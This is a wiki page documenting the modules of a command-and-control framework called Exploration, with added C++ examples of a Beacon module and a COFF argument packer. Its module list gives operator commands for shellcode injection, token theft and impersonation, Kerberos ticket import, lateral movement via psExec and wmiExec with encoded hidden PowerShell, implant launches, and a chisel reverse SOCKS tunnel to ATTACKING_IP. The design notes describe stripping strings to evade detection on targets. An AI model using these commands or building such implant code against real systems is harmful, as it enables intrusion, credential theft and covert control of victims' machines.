
6 ‐ Modules

Maxime dcb edited this page Oct 27, 2024 · 5 revisions

Modules

Modules are additional functionalities for the TeamServer and the Beacon. They come in three forms:

  • Linux .so libraries for the TeamServer, loaded by the TeamServer at start or when it is instructed to reload them.
  • Linux .so libraries for the Beacon, loaded by the Beacon when they are sent with the loadModule instruction. When compiled for this target they contain no static strings and only the necessary functions, so the binary that lands on the target carries no identifying text.
  • Windows .dll libraries for the Beacon, loaded by the Beacon when they are sent with the loadModule instruction. When compiled for this target they contain no static strings and only the necessary functions, so the binary that lands on the target carries no identifying text.

To this end, modules are identified by name on the TeamServer side and by hash on the Beacon side. In the same fashion, errors are represented as integers on the Beacon side and translated into messages on the TeamServer side.

virtual int init(std::vector<std::string>& splitedCmd, C2Message& c2Message) = 0;
virtual int process(C2Message& c2Message, C2Message& c2RetMessage) = 0;
virtual int followUp(const C2Message &c2RetMessage) {return 0;};
virtual int errorCodeToMsg(const C2Message &c2RetMessage, std::string& errorMsg) {return 0;};
virtual int recurringExec (C2Message& c2RetMessage) {return 0;};

init

Executed on the TeamServer side; prepares the message sent to the Beacon. It may contain strings, since those are not embedded in the module sent to the Beacon when it is compiled in release mode.

process

Executed on the Beacon side. The result is stored in c2RetMessage. It contains no static strings; if an error occurs it fills the errorCode of the C2Message.

followUp

Executed on the TeamServer side when some action must be taken after the module has executed. For example, in the case of download, followUp is in charge of saving the file to disk.

errorCodeToMsg

Executed on the TeamServer side; translates an error code into the associated message sent to the client.

recurringExec

Executed on the Beacon side when a recurring action must be taken. For example, the KeyLogger sends any additional keys pressed to the TeamServer each time the Beacon communicates with the TeamServer.
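The following is an added example written against the five-method interface described above; it is not code from the Exploration repository. It shows the split the text describes: init runs TeamServer side and may use strings, process runs Beacon side with no string literals, the module is matched by a hash on the Beacon side, and the Beacon reports failures as an integer that errorCodeToMsg translates. The C2Message struct, the module name PrintWorkingDirectory, the djb2 hash, the BUILD_BEACON flag and the error code values are all assumptions made for this example.

```cpp
#include <cstdint>
#include <filesystem>
#include <string>
#include <system_error>
#include <vector>

// Stand-in for the project's C2Message, constructed for this example only.
struct C2Message {
    uint64_t    instruction = 0;   // module hash: the only identifier the Beacon sees
    std::string cmd;               // module name: used on the TeamServer side only
    std::string args;
    std::string returnvalue;
    int         errorCode = 0;
};

// Compile-time djb2 (assumed here; not necessarily the project's hash), so the
// Beacon build embeds a number where the TeamServer build embeds the name.
constexpr uint64_t djb2(const char* s, uint64_t h = 5381) {
    return *s ? djb2(s + 1, (h << 5) + h + static_cast<unsigned char>(*s)) : h;
}

constexpr const char* kModuleName = "PrintWorkingDirectory";  // assumed module name
constexpr uint64_t    kModuleHash = djb2(kModuleName);

// Error codes travel as integers; only errorCodeToMsg knows their text.
enum : int { ERR_OK = 0, ERR_BAD_ARGS = 1, ERR_CWD = 2 };

class PrintWorkingDirectory {
public:
    // TeamServer side: turn the operator's split command line into a C2Message.
    int init(std::vector<std::string>& splitedCmd, C2Message& c2Message) {
        if (splitedCmd.size() != 1) return ERR_BAD_ARGS;  // "pwd" takes no arguments
        c2Message.instruction = kModuleHash;
#ifndef BUILD_BEACON   // assumed build flag: keep the name out of the Beacon binary
        c2Message.cmd = kModuleName;
#endif
        return ERR_OK;
    }

    // Beacon side: no string literals; result in c2RetMessage, failure as an int.
    int process(C2Message& c2Message, C2Message& c2RetMessage) {
        c2RetMessage.instruction = c2Message.instruction;
        std::error_code ec;
        std::filesystem::path cwd = std::filesystem::current_path(ec);
        if (ec) {
            c2RetMessage.errorCode = ERR_CWD;
            return ERR_CWD;
        }
        c2RetMessage.returnvalue = cwd.string();
        return ERR_OK;
    }

    // TeamServer side: map the integer the Beacon returned to text for the client.
    int errorCodeToMsg(const C2Message& c2RetMessage, std::string& errorMsg) {
        switch (c2RetMessage.errorCode) {
            case ERR_OK:       break;
            case ERR_BAD_ARGS: errorMsg = "pwd takes no arguments"; break;
            case ERR_CWD:      errorMsg = "could not read the current directory"; break;
            default:           errorMsg = "unknown error code"; break;
        }
        return 0;
    }
};

// Run the TeamServer -> Beacon -> TeamServer round trip in one process.
// Returns the Beacon-side error code; fills out (result) and err (translated message).
int roundTrip(std::vector<std::string> cmd, std::string& out, std::string& err) {
    PrintWorkingDirectory mod;
    C2Message msg, ret;
    int rc = mod.init(cmd, msg);
    if (rc != ERR_OK) {
        ret.errorCode = rc;            // init failed: nothing is sent to the Beacon
    } else {
        mod.process(msg, ret);         // what the Beacon would do on receipt
    }
    mod.errorCodeToMsg(ret, err);
    out = ret.returnvalue;
    return ret.errorCode;
}

int main() {
    std::string out, err;
    int rc = roundTrip({"pwd"}, out, err);
    return rc == ERR_OK && !out.empty() ? 0 : 1;
}
```

The design point is that everything human-readable (the module name, the error text, the argument check message) lives in code paths that only the TeamServer build compiles in; the Beacon-side process only ever deals with a hash, a path it read at runtime and an integer.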

Modules list

loadModule
    Load a module DLL file into the memory of the beacon, giving the beacon that capability.
    Load the DLL from the given path; if it is not found, try the default ../Modules/ path.
    example:
    - loadModule /tools/PrintWorkingDirectory.dll

assemblyExec
    Execute shellcode in a process (notepad.exe), wait for the end of execution or a timeout (120 sec), and retrieve the output.
    Use -r to use a shellcode file.
    If -e or -d is given, donut is used to create the shellcode.
    example:
    - assemblyExec -r ./shellcode.bin
    - assemblyExec -e ./program.exe arg1 arg2...
    - assemblyExec -e ./Seatbelt.exe -group=system
    - assemblyExec -d ./test.dll method arg1 arg2...

upload
    Upload a file from the attacker machine to the victim machine.
    example:
    - upload c:\temp\toto.exe c:\temp\toto.exe

download
    Download a file from the victim machine to the attacker machine.
    example:
    - download c:\temp\toto.exe c:\temp\toto.exe

run
    Run a new process on the system.
    If the command is a cmd.exe built-in, use the syntax 'cmd /c command'.
    The beacon waits for the command to end and returns its output.
    example:
    - run whoami
    - run cmd /c dir
    - run .\Seatbelt.exe -group=system

script
    -

inject
    Inject shellcode into the process with the given pid. On Linux you must be root or at least hold the ptrace capability.
    No output is provided.
    Use -r to use a shellcode file.
    If -e or -d is given, donut is used to create the shellcode.
    If pid is negative, a new process is created for the injection.
    example:
    - inject -r ./calc.bin 2568
    - inject -e ./beacon.exe pid arg1 arg2
    - inject -d ./calc.dll pid method arg1 arg2

pwd
    PrintWorkingDirectory

cd
    ChangeDirectory

ls
    ListDirectory

ps
    ListProcesses

makeToken
    Create a token from a username and password and impersonate it.
    example:
    - makeToken DOMAIN\Username Password

rev2self
    Drop the impersonation of a token created with makeToken.
    example:
    - rev2self

stealToken
    Steal the token of a process and impersonate it. You must have administrator privileges.
    example:
    - stealToken pid

coffLoader
    Load a COFF .o file and execute it.
    The COFF takes packed arguments as input; you specify their types as a string of [Z,z,s,i] for wstring, string, short, int.
    example:
    - coffLoader ./dir.x64.o go Zs c:\ 0
    - coffLoader ./whoami.x64.o

powershell
    Execute a PowerShell command.
    To be sure to get the output of the command do 'cmd

kerberosUseTicket
    Import a Kerberos ticket from a file into the current LUID.
    example:
    - KerberosUseTicket /tmp/ticket.kirbi

psExec
    Copy an exe to an SMB share of the victim and create a service that launches it as SYSTEM.
    The exe must be a service binary or inject itself into another process.
    You must have the right Kerberos tickets.
    example:
    - psExec m3dc.cyber.local /tmp/implant.exe
    - psExec 10.9.20.10 /tmp/implant.exe

wmiExec
    Execute a command through Windows Management Instrumentation (WMI).
    The user must be an administrator of the remote machine.
    Can be used with credentials or with Kerberos authentication.
    To use Kerberos, the ticket must be in memory (use Rubeus).
    example:
    - wmiExec -u DOMAIN\Username Password target powershell.exe -nop -w hidden -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AV
    - wmiExec -k DOMAIN\dc target powershell.exe -nop -w hidden -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AV

spawnAs
    Launch a new process as another user, with the given credentials.
    example:
    - spawnAs DOMAIN\Username Password powershell.exe -nop -w hidden -e SQBFAFgAIAAoACgA...
    - spawnAs .\Administrator Password C:\Users\Public\Documents\implant.exe

chisel
    Launch chisel in a thread on the remote host.
    No output is provided.
    example:
    - chisel status
    - chisel stop pid
    Reverse SOCKS proxy:
    - chisel /tools/chisel.exe client ATTACKING_IP:LISTEN_PORT R:socks
    - On the attacking machine: chisel server -p LISTEN_PORT --reverse
    Remote port forward:
    - chisel /tools/chisel.exe client ATTACKING_IP:LISTEN_PORT R:LOCAL_PORT:TARGET_IP:REMOTE_PORT
    - On the attacking machine: chisel server -p LISTEN_PORT --reverse

tree
    Tree

socks
    Start a SOCKS5 server on the TeamServer and tunnel the traffic to the Beacon.
    The tunneling is done over the beacon's own communication protocol.
    Only one SOCKS5 server can be open at a time.
    example:
    - socks start 1080
    - socks stop
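The coffLoader entry above describes its arguments only as a type string of [Z,z,s,i] followed by the values. The following is an added example, not Exploration's own code, of a packer that turns such a type string and its values into the byte buffer a COFF entry point would parse. The byte layout (a 4-byte little-endian total length, then per argument: int as 4 bytes, short as 2 bytes, string as length + bytes + NUL, wstring as length + UTF-16LE + two-byte NUL) is the common BOF convention and is an assumption here; Exploration may pack differently. The function name packCoffArgs and the helper names are also assumptions.

```cpp
#include <cstdint>
#include <cstdlib>
#include <stdexcept>
#include <string>
#include <vector>

namespace {

void putU32(std::vector<uint8_t>& b, uint32_t v) {
    for (int i = 0; i < 4; ++i) b.push_back(static_cast<uint8_t>(v >> (8 * i)));
}
void putU16(std::vector<uint8_t>& b, uint16_t v) {
    b.push_back(static_cast<uint8_t>(v));
    b.push_back(static_cast<uint8_t>(v >> 8));
}

// Strict integer parse: rejects trailing junk and out-of-range values instead of
// silently packing 0, which would hand the COFF an argument the operator never typed.
long parseInt(const std::string& s, long lo, long hi) {
    char* end = nullptr;
    long v = std::strtol(s.c_str(), &end, 0);
    if (s.empty() || end == s.c_str() || *end != '\0' || v < lo || v > hi)
        throw std::invalid_argument("bad numeric argument: " + s);
    return v;
}

}  // namespace

// Pack the arguments for one coffLoader invocation.
//   types: one char per argument, Z=wstring, z=string, s=short, i=int
//   args : the operator-supplied values, e.g. {"c:\\", "0"} for "Zs"
// Layout (assumed, common BOF convention): u32 total length, then per argument
// i -> 4 bytes LE, s -> 2 bytes LE, z -> u32 length + bytes + NUL,
// Z -> u32 byte length + UTF-16LE code units + two-byte NUL.
std::vector<uint8_t> packCoffArgs(const std::string& types,
                                  const std::vector<std::string>& args) {
    if (types.size() != args.size())
        throw std::invalid_argument("type string length does not match argument count");

    std::vector<uint8_t> body;
    for (size_t i = 0; i < types.size(); ++i) {
        const std::string& a = args[i];
        switch (types[i]) {
            case 'i':
                putU32(body, static_cast<uint32_t>(parseInt(a, INT32_MIN, INT32_MAX)));
                break;
            case 's':
                putU16(body, static_cast<uint16_t>(parseInt(a, INT16_MIN, INT16_MAX)));
                break;
            case 'z':
                putU32(body, static_cast<uint32_t>(a.size() + 1));
                body.insert(body.end(), a.begin(), a.end());
                body.push_back(0);
                break;
            case 'Z': {  // ASCII widened to UTF-16LE; non-ASCII input is rejected
                for (unsigned char c : a)
                    if (c >= 0x80) throw std::invalid_argument("non-ASCII wstring argument: " + a);
                putU32(body, static_cast<uint32_t>((a.size() + 1) * 2));
                for (unsigned char c : a) { body.push_back(c); body.push_back(0); }
                body.push_back(0);
                body.push_back(0);
                break;
            }
            default:
                throw std::invalid_argument(std::string("unknown type char: ") + types[i]);
        }
    }

    std::vector<uint8_t> out;
    putU32(out, static_cast<uint32_t>(body.size()));
    out.insert(out.end(), body.begin(), body.end());
    return out;
}

int main() {
    // The page's own example: coffLoader ./dir.x64.o go Zs c:\ 0
    std::vector<uint8_t> packed = packCoffArgs("Zs", {"c:\\", "0"});
    return packed.size() == 18 ? 0 : 1;
}
```

The checks matter more than the byte shuffling: a type string that does not match the argument count, a non-numeric value for i or s, or a value that does not fit the declared width are all rejected before anything is sent, because a COFF running in the beacon process reads whatever it is handed with no further validation.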